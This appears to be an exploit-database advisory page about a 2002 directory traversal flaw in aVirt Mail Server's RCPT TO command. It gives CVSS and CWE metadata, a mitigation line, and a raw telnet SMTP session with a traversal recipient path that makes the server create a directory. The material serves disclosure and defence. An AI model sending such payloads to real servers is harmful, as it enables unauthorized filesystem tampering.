aVirt Mail Server RCPT TO Command Vulnerability

vendor:

Mail Server

by:

SecurityFocus

4.3

CVSS

MEDIUM

Directory Traversal

22 (Path Traversal)

CWE

Product Name: Mail Server

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2002

aVirt Mail Server RCPT TO Command Vulnerability

The aVirt Mail Server has a weakness in the code that handles the RCPT TO command. By specifying a path in the command instead of an email recipient, an attacker could cause the mail server to create a directory in the server's local filesystem. This will cause the mail server to create a root directory called 'createdir', which will contain 1 file. Testing indicates that this method cannot be used to overwrite existing folders.

Mitigation:

Ensure that the RCPT TO command is properly validated and sanitized to prevent directory traversal attacks.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/764/info

The aVirt Mail Server has a weakness in the code that handles the RCPT TO command. By specifying a path in the command instead of an email recipient , an attacker could cause the mail server to create a directory in the server's local filesystem.

telnet targethost:25

> 220 server aVirt Mail SMTP Server Ready.
MAIL FROM: user
> 250 user, Sender OK
rcpt to:..\..\..\..\createdir
> 250 ..\..\..\..\createdir, Recipient OK
data
> 354 Please enter mail, ending with a "." on a line by itself
blablabla
.
> 250 Mail accepted.

This will cause the mail server to create a root directory called "createdir", which will contain 1 file. Testing indicates that this method cannot be used to overwrite existing folders.